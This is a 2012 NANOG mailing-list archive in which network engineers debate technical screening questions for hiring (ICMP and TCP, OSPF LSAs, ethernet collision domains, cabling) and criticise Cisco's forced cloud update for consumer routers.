--Dave From bill at herrin.us Thu Jul 5 21:36:28 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 22:36:28 -0400 Subject: job screening question In-Reply-To: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> References: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: On Thu, Jul 5, 2012 at 10:10 PM, Randy wrote: > How about another HR-Question: > > what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? Override the dynamic (e.g. DHCP) default route. Often so you can implement a workaround that central Network Security wouldn't approve of. :-) Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From owen at delong.com Thu Jul 5 21:37:02 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 19:37:02 -0700 Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: On Jul 5, 2012, at 6:28 PM, Jon Lewis wrote: > On Thu, 5 Jul 2012, William Herrin wrote: > >> On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote: >>> I would use questions such as the following: >>> >>> 1. How many end-sites can be numbered from a single /32. >>> (Correct answers: IPv4 - 1, IPv6 - 65,536) >> >> IPv6 - 16,777,216 to 268,435,456 :p >> I'd accept those if I was willing to send the candidate to rational IPv6 networking re-education camp. If I expected the candidate to be able to do real work immediately, I would require the correct answer as specified above. Assigning a /56 to an end-site is bad juju. Assigning a /60 is pure useless evil. >> >>> 5. What is the reason for the 100m distance limit within an ethernet collision domain? >> >> What's an ethernet collision domain? Seriously, when was the last time >> you dealt with a half duplex ethernet? 
> > You've never (much less recently) seen a customer misconfigure their end of an ethernet handoff such that you end up with duplex mismatch? Granted, in that case, distance is irrelevant...but it is half half-duplex ethernet :) Either way, the collision domain itself is irrelevant to the question at hand... The important thing is to find out that the candidate understands what an ethernet pre-amble is and why it is important. Owen From jared at puck.nether.net Thu Jul 5 21:54:13 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 22:54:13 -0400 Subject: job screening question In-Reply-To: References: Message-ID: Long long time ago I was asked a good one: is ospf TCP or udp. Thankfully I knew the answer. On Jul 5, 2012, at 7:20 PM, Diogo Montagner wrote: > 1) What is the LSA number for an external route in OSPF? From jared at puck.nether.net Thu Jul 5 22:00:27 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 23:00:27 -0400 Subject: job screening question In-Reply-To: <20120705164836.EEEE1921@resin13.mta.everyone.net> References: <20120705164836.EEEE1921@resin13.mta.everyone.net> Message-ID: <5199ACAC-E043-4704-BFFD-EEEB7B9CB135@puck.nether.net> Agreed. I wouldn't know the answer to this nor do I care.... Not because it's not important and not because i couldn't figure it out, but because it's like asking me to implement the spec.. Now if you asked me about what a bgp marker or mp-nlri looks like I can answer that. Same goes for why ssm, and what multicast groups shouldn't be forwarded off-LAN. (And those that you might want to hack around with an application relay to other LANs). - Jared On Jul 5, 2012, at 7:48 PM, "Scott Weeks" wrote: > How often do you use this in everyday netgeeking? Asking these > types of questions will assure that you get someone with a vendor > i-drank-the-kool-aid cert because they memorized the answers, but > maybe not the best candidate for the position. 
However, with some of today's managers kool-aid certs are looked on as better than an engineering degree. Go figure... :-(

From rs at seastrom.com Thu Jul 5 22:04:05 2012 From: rs at seastrom.com (Robert E. Seastrom) Date: Thu, 05 Jul 2012 23:04:05 -0400 Subject: job screening question In-Reply-To: (Diogo Montagner's message of "Fri, 6 Jul 2012 07:20:12 +0800") References: Message-ID: <86obntzj2y.fsf@seastrom.com>

Diogo Montagner writes:
> For screening questions (for 1st level filtering), IMO, the questions
> have to be straight to the point, for example:
>
> 1) What is the LSA number for an external route in OSPF?
>
> This can have two answers: 5 or 7. So, I will accept if the candidate
> answers 5, 7 or 5 and 7. Later on (the next level of the interview), a
> technical interviewer will check if the candidate understands the
> differences of LSA 5 and 7.

Frankly, this feels a bit like asking what the 9th byte in an IP header is used for (it's TTL, but who's, uh, counting?) -- "That's why God gave us packet analyzers" should be counted as an acceptable answer. If not, you'll find yourself skipping over plenty of extremely well qualified candidates in favor of those who have crammed recently for some sort of exam in hopes of compensating for their short CV.

-r

From bill at herrin.us Thu Jul 5 22:05:21 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 23:05:21 -0400 Subject: job screening question In-Reply-To: <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> Message-ID:

On Thu, Jul 5, 2012 at 10:25 PM, Owen DeLong wrote:
> On Jul 5, 2012, at 5:50 PM, Scott Weeks wrote:
>> --- bill at herrin.us wrote:
>> From: William Herrin
>>
>>> 5. What is the reason for the 100m distance limit within an ethernet collision domain?
>>
>> What's an ethernet collision domain? Seriously, when was the last time
>> you dealt with a half duplex ethernet?
>> ----------------------------------------- >> >> >> Now if someone answered it that way, I'd definitely be >> interested while the HR person would just hang up... > > +1 -- That would be a perfectly valid answer and one of the list of answers I would actually give to HR. Incidentally, 100m was the segment limit. IIRC the collision domain comprising the longest wire distance between any two hosts was larger, something around 200m for fast ethernet. Essentially, the collision signal caused by receiving the first bit of the overlapping packet had to get back to the sender before the sender finished the 64-byte minimum-size packet. Allow for the speed of light and variances in the electronics and that was the width of the collision domain. Carrier sensing multiple access with collision detection. CSMA/CD. I haven't thought about that in a long time. -Bill -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From bicknell at ufp.org Thu Jul 5 22:26:49 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Thu, 5 Jul 2012 20:26:49 -0700 Subject: job screening question In-Reply-To: References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> Message-ID: <20120706032649.GA28634@ussenterprise.ufp.org> In a message written on Thu, Jul 05, 2012 at 11:05:21PM -0400, William Herrin wrote: > Incidentally, 100m was the segment limit. IIRC the collision domain > comprising the longest wire distance between any two hosts was larger, > something around 200m for fast ethernet. Essentially, the collision Actually it can be much longer, having worked on a longer such ethernet many, many moons ago. 
The longest spec-compliant, repeater-only network looks like:

      |
      | Host Segment
      |
      + Copper to Fiber Repeater
      |
      | 2km fiber, no hosts
      |
      + Copper to Fiber Repeater
      |
      | Host Segment, with or without hosts
      |
      + Copper to Fiber Repeater
      |
      | 2km fiber, no hosts
      |
      + Copper to Fiber Repeater
      |
      | Host Segment
      |

With 10base5, a copper segment can be 500m, so 500+2000+500+2000+500, or 5.5km. With 10base2, a copper segment can be 185m, so 185+2000+185+2000+185, or 4.5km. With 10baseT, a copper segment can be 100m, so 100+2000+100+2000+100, or 4.4km.

The introduction of fiber repeaters is why folks started to use the broken term "half repeater". This was so folks who learned the rules as "2 repeaters in the path" could deal with the fact that it's actually the 5-4-3 rule, so they called the 4 repeaters two half repeaters.

Of course, each repeater could be a multi-port repeater (or a hub in 10baseT speak) and thus have a star configuration off of it in the diagram.

Add in a couple of 2 port bridges to reframe things, and it's quite possible to run a layer 2 ethernet that is 10's of km long, and has thousands of hosts on it. There was a day when 3000-4000 hosts on a single layer 2 network at 10Mbps was living large. Thankfully, not anymore.

-- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From owen at delong.com Thu Jul 5 22:28:01 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 20:28:01 -0700 Subject: job screening question In-Reply-To: References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> Message-ID: On Jul 5, 2012, at 8:05 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 10:25 PM, Owen DeLong wrote: >> On Jul 5, 2012, at 5:50 PM, Scott Weeks wrote: >>> --- bill at herrin.us wrote: >>> From: William Herrin >>> >>>> 5. What is the reason for the 100m distance limit within an ethernet collision domain? >>> >>> What's an ethernet collision domain? Seriously, when was the last time >>> you dealt with a half duplex ethernet? >>> ----------------------------------------- >>> >>> >>> Now if someone answered it that way, I'd definitely be >>> interested while the HR person would just hang up... >> >> +1 -- That would be a perfectly valid answer and one of the list of answers I would actually give to HR. > > Incidentally, 100m was the segment limit. IIRC the collision domain > comprising the longest wire distance between any two hosts was larger, > something around 200m for fast ethernet. Essentially, the collision > signal caused by receiving the first bit of the overlapping packet had > to get back to the sender before the sender finished the 64-byte > minimum-size packet. Allow for the speed of light and variances in the > electronics and that was the width of the collision domain. > It was, but only if the device in between segments provided "retiming" which basically meant collision-handling buffering. The requirement was (IIRC) that the preamble traverse the entire wire so that everyone could hear it and back off before data hit the wire. Bonus points for knowing that a "late collision" describes "hearing" a collision after you started transmitting data. 
> Carrier sensing multiple access with collision detection. CSMA/CD. I > haven't thought about that in a long time. Heh... It still has its uses, even in human conversations. ;-) Owen From owen at delong.com Thu Jul 5 22:45:20 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 20:45:20 -0700 Subject: job screening question In-Reply-To: <20120706032649.GA28634@ussenterprise.ufp.org> References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> <20120706032649.GA28634@ussenterprise.ufp.org> Message-ID: <65535B10-CC6B-4F7D-84CB-E3A880A9B1EE@delong.com> > > Add in a couple of 2 port bridges to reframe things, and it's quite > possible to run a layer 2 ethernet that is 10's of km long, and has > thousands of hosts on it. There was a day when 3000-4000 hosts on > a single layer 2 network at 10Mbps was living large. > The bridges terminate the collision domain though not the broadcast domain. That was one reason for specifying a collision domain rather than using terms such as subnet, network, etc. Owen From jj at diamondtech.ca Thu Jul 5 22:47:50 2012 From: jj at diamondtech.ca (Jeff Johnstone) Date: Thu, 5 Jul 2012 20:47:50 -0700 Subject: Cisco Update In-Reply-To: <201207060101.q6611bIB086234@aurora.sol.net> References: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> <201207060101.q6611bIB086234@aurora.sol.net> Message-ID: On Thu, Jul 5, 2012 at 6:01 PM, Joe Greco wrote: > > I see. > > > > Replace "local access" control with "let anyone on the internet > reconfigure= > > the thing". Whoever's idea it was should be p*ssed on, keelhauled, > drawn = > > and quartered, then burned at the stake. > > > It'll get real interesting when Cisco's cloud database is breached and > some weakness in the password encryption is discovered. > > ... JG > What encryption? 
Web stuff was probably built by a consultant using an open source database store :) Jeff From mysidia at gmail.com Thu Jul 5 23:11:48 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Thu, 5 Jul 2012 23:11:48 -0500 Subject: Cisco Update In-Reply-To: <201207060101.q6611bIB086234@aurora.sol.net> References: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> <201207060101.q6611bIB086234@aurora.sol.net> Message-ID: On 7/5/12, Joe Greco wrote: > It'll get real interesting when Cisco's cloud database is breached and > some weakness in the password encryption is discovered. [snip] Will the users' passwords even matter, if a compromise of the database allows an intruder to make a system-wide change to end users' equipment, such as delivering a compromising configuration change, or a "patched" firmware update that deactivates cloud service and turns them all into botnet nodes under exclusive control of the compromiser ? Hopefully Cisco thought that stuff out, but password encryption weaknesses at least are easily addressed by forcing all users to reset pw, and requiring a proof of physical access to the unit. -- -JH From randy_94108 at yahoo.com Thu Jul 5 23:17:29 2012 From: randy_94108 at yahoo.com (Randy) Date: Thu, 5 Jul 2012 21:17:29 -0700 (PDT) Subject: job screening question In-Reply-To: Message-ID: <1341548249.22747.YahooMailClassic@web181119.mail.ne1.yahoo.com> --- On Thu, 7/5/12, William Herrin wrote: > From: William Herrin > Subject: Re: job screening question > To: "Randy" > Cc: "nanog at nanog.org" > Date: Thursday, July 5, 2012, 7:36 PM > On Thu, Jul 5, 2012 at 10:10 PM, > Randy > wrote: > > How about another HR-Question: > > > > what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes > accomplish? > > Override the dynamic (e.g. DHCP) default route. Often so you > can > implement a workaround that central Network Security > wouldn't approve > of. :-) Yes of course! But NOT the "answer" I am looking for(..and want to hear..) 
because - 1) having such default-routes "internally" is a terribly-bad/broken idea. I am looking for a "candidate" who can actually say the same and go on to say: "it is a kludge that can be put in place to load-share between two links to upstreams when "budgetary-constraints" prevent us from anything but static-routing - two upstreams terminating on the same router. There You go: So, There are some questions (includes Your original-question) that HR should not be asking. There is a big difference between Engineering-Management and Management-Engineering.....(Morton Thiokol/Challenger is a classic case in point.) Regards, ./Randy > > Regards, > Bill Herrin > > -- > William D. Herrin ................ herrin at dirtside.com? > bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > From sikandar.raman at gmail.com Thu Jul 5 23:36:48 2012 From: sikandar.raman at gmail.com (Ramanpreet Singh) Date: Thu, 5 Jul 2012 21:36:48 -0700 Subject: job screening question In-Reply-To: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> References: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: Aaawwe On Jul 5, 2012 7:10 PM, "Randy" wrote: > --- On Thu, 7/5/12, William Herrin wrote: > > > From: William Herrin > > Subject: Re: job screening question > > To: "Jon Lewis" > > Cc: "nanog at nanog.org" > > Date: Thursday, July 5, 2012, 6:43 PM > > On Thu, Jul 5, 2012 at 9:28 PM, Jon > > Lewis > > wrote: > > > You've never (much less recently) seen a customer > > misconfigure their end of > > > an ethernet handoff such that you end up with duplex > > mismatch? Granted, in > > > that case, distance is irrelevant...but it is half > > half-duplex ethernet :) > > > > If I was asking an ethernet question, I'd rather ask: > > > > 1. How do you make a crossover ethernet cable to connect two > > switches? > > (cross the green and orange pairs) > > > > 2. 
What happens if you plug that cable into a pair of
> > gigabit ethernet
> > switches? (mdix malfunctions, ports negotiate to 100 full,
> > on some
> > poorly implemented switches the mix of straight and crossed
> > wires
> > eventually damage the ports so they can no longer do gige)
> >
> > Regards,
> > Bill Herrin
>
>
> Or for that matter, in the absence of auto-MDI/MDIX:
>
> 1) when is a straight-through cable *required*?
> 2) when is a cross-over cable *required*?
>
> How about another HR-Question:
>
> what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish?
>
> ./Randy
>

From randy_94108 at yahoo.com Thu Jul 5 23:39:07 2012 From: randy_94108 at yahoo.com (Randy) Date: Thu, 5 Jul 2012 21:39:07 -0700 (PDT) Subject: job screening question In-Reply-To: Message-ID: <1341549547.81601.YahooMailClassic@web181114.mail.ne1.yahoo.com>

--- On Thu, 7/5/12, William Herrin wrote:
> From: William Herrin
> Subject: Re: job screening question
> To: "Randy"
> Cc: nanog at nanog.org
> Date: Thursday, July 5, 2012, 6:33 PM
> > Can you post a sample of the
> "answers" you have received; which
> > prompted you to ask this question to begin with.
>
> I've been asking the question in phone interviews for
> months. I
> couldn't quote them properly but the answers were...
> discouraging. No
> one beyond ping and traceroute.
>
> I asked HR last week to start asking the question as a
> pre-screen and
> forward me the answer. The first one responded "This would
> block all
> IP traffic." I figured it was time for a sanity check to
> make sure the
> question was reasonable.
>
> Regards,
> Bill
>

Yes....in that regard, "reasonable". It is a shame that NOC techs these days are classified as: 1) Network Engineers/Production Engineers/Customer Support Engineers/Sr. Tech Support Engineers.... Enough Said.
./Randy From cb.list6 at gmail.com Fri Jul 6 00:13:07 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Thu, 5 Jul 2012 22:13:07 -0700 Subject: Cisco Update In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: In Cisco's defense, perhaps the legalese did not fully communicate the intent of the service. http://blogs.cisco.com/home/update-answering-our-customers-questions-about-cisco-connect-cloud-2/ CB On Jul 5, 2012 8:52 AM, "Mario Eirea" wrote: > > Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for it's consumer level routers. > > http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service > > -Mario Eirea From sgtcasey at gmail.com Fri Jul 6 00:25:11 2012 From: sgtcasey at gmail.com (David Casey) Date: Thu, 5 Jul 2012 23:25:11 -0600 Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: <6E03AF80-B9DF-4D8C-8CFC-4CCA08065C4A@gmail.com> On Jul 5, 2012, at 18:32, William Herrin wrote: > On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote: >> I would use questions such as the following: >> >> 1. How many end-sites can be numbered from a single /32. >> (Correct answers: IPv4 - 1, IPv6 - 65,536) > > IPv6 - 16,777,216 to 268,435,456 :p > > >> 5. What is the reason for the 100m distance limit within an ethernet collision domain? > > What's an ethernet collision domain? Seriously, when was the last time > you dealt with a half duplex ethernet? Today. Legacy devices still require half-duplex sometimes. 
Dave From randy at psg.com Fri Jul 6 00:44:12 2012 From: randy at psg.com (Randy Bush) Date: Fri, 06 Jul 2012 14:44:12 +0900 Subject: Cisco Update In-Reply-To: References: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> <201207060101.q6611bIB086234@aurora.sol.net> Message-ID: cisco has recanted on the forced cloud etc randy From mpalmer at hezmatt.org Fri Jul 6 01:18:21 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Fri, 6 Jul 2012 16:18:21 +1000 Subject: job screening question In-Reply-To: <20120705170139.EEEE1B26@resin13.mta.everyone.net> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> Message-ID: <20120706061821.GU2221@hezmatt.org> On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: > > > --- jason at thebaughers.com wrote: > From: Jason Baugher > > Geez, I'd be happy to find someone with a good attitude, a solid work > ethic, and the desire and aptitude to learn. :) > --------------------------------------- > > > Yeah, that. But how do you get those folks through the HR > process to you, so you can decipher their skill/work ethic > level? What can the HR person ask to find out if someone > has these qualities? OSPF LSA type questions will not help. Don't get HR to do that sort of screening. They suck mightily at it. I lack any sort of HR department to get in the way, and I'm glad of it -- I don't see the value in having someone who doesn't know anything about the job get in the way of finding the right person for it. Sure, get 'em to do the scutwork of posting job ads, collating resumes, scheduling things and sending the "lolz no!" responses, but actually filtering? Nah, I'll do that bit thanks. If you have to have HR do a filter call, make it *really* simple, like "What does TCP stand for?" -- sadly, you'll still probably filter out half the applicants for a senior position... 
- Matt From scott at doc.net.au Fri Jul 6 01:31:19 2012 From: scott at doc.net.au (Scott Howard) Date: Thu, 5 Jul 2012 23:31:19 -0700 Subject: Cisco Update In-Reply-To: References: <201207051524.q65FO9n3079600@aurora.sol.net> <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> Message-ID: On Thu, Jul 5, 2012 at 9:42 AM, Jon Lewis wrote: > Routers are sometimes used on networks that don't have internet > connectivity [by design]. This seems amazingly short-sighted for a company > that's been around selling routing gear as long as cisco. > If the router is not connected to the internet (either due to network design, or just because you ripped out the WAN cable) then it IS able to be managed locally. Plug the Internet back in, and that option goes away. Scott From don at bowenvale.co.nz Fri Jul 6 01:40:17 2012 From: don at bowenvale.co.nz (Don Gould) Date: Fri, 06 Jul 2012 18:40:17 +1200 Subject: job screening question In-Reply-To: References: Message-ID: <4FF68851.1070008@bowenvale.co.nz> Ok, so I read over Williams OP... I have 25 years IT experience... I've applied for a few jobs in my time... I thought to myself "I'll have a crack with a few comments!!!"... ....then I read down the next 30 posts and decided that perhaps I didn't really know enough about networking to really comment... ...and perhaps I needed a bit more grey hair and eat more RFCs for breakfast... ...then I read down the next 30 posts and realised that I really didn't know enough about computing to comment.... ...and perhaps my problem wasn't lack of grey hair, but just to much hair... ...Talk about a bunch of intimidating uber geeks! :) I suspect that when I read down the next 30 posts I'll just back away from the computer slowly knowing that I'm just not smart enough to use this device. But seriously guys, great thread with tons of really interesting stuff and a bunch of history. 
D On 6/07/2012 5:02 a.m., William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > -- Don Gould 31 Acheson Ave Mairehau Christchurch, New Zealand Ph: + 64 3 348 7235 Mobile: + 64 21 114 0699 From elmi at 4ever.de Fri Jul 6 01:43:13 2012 From: elmi at 4ever.de (Elmar K. Bins) Date: Fri, 6 Jul 2012 08:43:13 +0200 Subject: job screening question In-Reply-To: References: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: <20120706064313.GU28581@h.detebe.org> On Thu, Jul 5, 2012 at 10:10 PM, Randy wrote: > How about another HR-Question: > > what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? Nothing much. The first is half-assed and the second's a typo. El "do I get the job?" mar... From goemon at anime.net Fri Jul 6 02:28:41 2012 From: goemon at anime.net (goemon at anime.net) Date: Fri, 6 Jul 2012 00:28:41 -0700 (PDT) Subject: Cisco Update In-Reply-To: References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: "We take responsibility for that lack of clarity, and we are taking steps to make this right." including firing the idiot responsible? 
-Dan On Thu, 5 Jul 2012, Cameron Byrne wrote: > In Cisco's defense, perhaps the legalese did not fully communicate the > intent of the service. > > http://blogs.cisco.com/home/update-answering-our-customers-questions-about-cisco-connect-cloud-2/ > > CB > > On Jul 5, 2012 8:52 AM, "Mario Eirea" wrote: >> >> Has anyone seen this yet? Looks like Cisco was forcing people to join its > Cloud service through an update for it's consumer level routers. >> >> > http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service >> >> -Mario Eirea > From mpalmer at hezmatt.org Fri Jul 6 02:42:42 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Fri, 6 Jul 2012 17:42:42 +1000 Subject: job screening question In-Reply-To: <86obntzj2y.fsf@seastrom.com> References: <86obntzj2y.fsf@seastrom.com> Message-ID: <20120706074242.GY2221@hezmatt.org> On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > Diogo Montagner writes: > > For screening questions (for 1st level filtering), IMO, the questions > > has to be straight to the point, for example: > > > > 1) What is the LSA number for an external route in OSPF? > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > > techinical interviewer will chech if the candidate understand the > > differences of LSA 5 and 7. > > Frankly, this feels a bit like asking what the 9th byte in an IP > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > God gave us packet analyzers" should be counted as an acceptable > answer. If not, you'll find yourself skipping over plenty of > extremely well qualified candidates in favor of those who have crammed > recently for some sort of exam in hopes of compensating for their > short CV. Ugh, I know someone (thankfully no longer a current colleague) who ardently *defends* his use of questions like "what does the -M option to ps do?" 
on the basis that "any senior person who knows what they're doing should know all the options to ps!". No, you useless tit, anyone who knows what they're doing should know how to read a bloody manpage. Trivia tests get you hiring people who know trivia. Knowing trivia has its productivity benefits, but if you can't apply it, it's useless. - Matt -- Politics and religion are just like software and hardware. They all suck, the documentation is provably incorrect, and all the vendors tell lies. -- Andrew Dalgleish, in the Monastery

From hank at efes.iucc.ac.il Fri Jul 6 02:54:09 2012 From: hank at efes.iucc.ac.il (Hank Nussbacher) Date: Fri, 06 Jul 2012 10:54:09 +0300 Subject: Cisco Update In-Reply-To: References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: <5.1.1.6.2.20120706105226.052719d0@efes.iucc.ac.il> At 00:28 06/07/2012 -0700, goemon at anime.net wrote: >"We take responsibility for that lack of clarity, and we are taking steps >to make this right." > >including firing the idiot responsible? The Nussbacher axiom of management - "Management is like a cesspool - the really big chunks float to the top". I would assume the person responsible will one day be running Cisco. -Hank >-Dan > >On Thu, 5 Jul 2012, Cameron Byrne wrote: > >>In Cisco's defense, perhaps the legalese did not fully communicate the >>intent of the service. >> >>http://blogs.cisco.com/home/update-answering-our-customers-questions-about-cisco-connect-cloud-2/ >> >>CB >> >>On Jul 5, 2012 8:52 AM, "Mario Eirea" wrote: >>> >>>Has anyone seen this yet? Looks like Cisco was forcing people to join its >>Cloud service through an update for its consumer level routers.
>>> >>http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service >>> >>>-Mario Eirea From rayw at rayw.net Fri Jul 6 04:39:13 2012 From: rayw at rayw.net (Ray Wong) Date: Fri, 6 Jul 2012 02:39:13 -0700 Subject: job screening question In-Reply-To: <20120706074242.GY2221@hezmatt.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > *defends* his use of questions like "what does the -M option to ps do?" on > the basis that "any senior person who knows what they're doing should know > all the options to ps!". No, you useless tit, anyone who knows what they're > doing should know how to read a bloody manpage. > Beyond that, if by "Senior" the role is the one the other tech people turn to when they're out of knowledge/skills/ability, there's just too much breadth to remember every detail about every tool. Quite the opposite from remembering every option to a tool, it's impossible to even keep track of every tool. The job as "senior" people is to figure out the stuff that we don't always know within that company. The main benefit of questions for HR to ask is the bozon filter: make sure it's actually someone who does network, or systems, or database, or whatever work. If one question (or even 10) could reveal the level of responsibility someone were capable of, we wouldn't need the interview process. From joseph.snyder at gmail.com Fri Jul 6 08:28:10 2012 From: joseph.snyder at gmail.com (joseph.snyder at gmail.com) Date: Fri, 06 Jul 2012 09:28:10 -0400 Subject: job screening question In-Reply-To: <20120706074242.GY2221@hezmatt.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: I agree. Let the person talk do a few probing questions based off what they say. If you yourself have any value you should be able to tell if they have a chance. 
Also I would prefer someone who says I don't know for sure but maybe something along these lines, and then wants to know the right answer. Passion is also important, if you are willing to hire someone who is in it for just a paycheck, save yourself the headache and get a contractor. -- Sent from my Android phone with K-9 Mail. Please excuse my brevity. Matthew Palmer wrote: On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > Diogo Montagner writes: > > For screening questions (for 1st level filtering), IMO, the questions > > has to be straight to the point, for example: > > > > 1) What is the LSA number for an external route in OSPF? > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > > techinical interviewer will chech if the candidate understand the > > differences of LSA 5 and 7. > > Frankly, this feels a bit like asking what the 9th byte in an IP > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > God gave us packet analyzers" should be counted as an acceptable > answer. If not, you'll find yourself skipping over plenty of > extremely well qualified candidates in favor of those who have crammed > recently for some sort of exam in hopes of compensating for their > short CV. Ugh, I know someone (thankfully no longer a current colleague) who ardently *defends* his use of questions like "what does the -M option to ps do?" on the basis that "any senior person who knows what they're doing should know all the options to ps!". No, you useless tit, anyone who knows what they're doing should know how to read a bloody manpage. Trivia tests get you hiring people who know trivia. Knowing trivia has it's productivity benefits, but if you can't apply it, it's useless. - Matt -- Politics and religion are just like software and hardware. They all suck, the documentation is provably incorrect, and all the vendors tell lies. 
-- Andrew Dalgleish, in the Monastery

From itsmemattchung at gmail.com Fri Jul 6 09:19:48 2012 From: itsmemattchung at gmail.com (Matt Chung) Date: Fri, 6 Jul 2012 09:19:48 -0500 Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: A former manager of mine once told me you can gauge a person's understanding by the questions they ask and I personally agree with this statement. Most of us will be able to make a reasonable assessment of the person by listening to the content of their questions. I'm not looking for an immediate resolution, but trying to understand the thought process of the individual. I feel realistic scenarios provide some insight on the individual's analytical skills. "A client cannot access the website "http://xyz.com". What do you do to troubleshoot this issue?" Depending on the candidate, I've seen a variety of answers:
1) "Can you ping the device?"
2) "Can you access the gateway?"
3) "What does the running config look like on the router"
4) "Is there a firewall in between"
I believe these questions may be asked in the right context provided there is enough information to isolate the issue to the network however the statement is devoid of anything useful that would make the network suspect. I would like to hear some questions such as: "are other websites accessible? Or is the only website the client is experiencing issues with?" "was the website working previously? when did it start happening?" "what does the client see on their screen ? are they getting an error?" These questions reflect the person's ability to accurately understand the problem before deep diving into the technical details. From there, you can get more technical. "Client is receiving an HTTP 404 error." Great, rule out network since this is an application layer response... just my .02. On Fri, Jul 6, 2012 at 8:28 AM, wrote: > I agree.
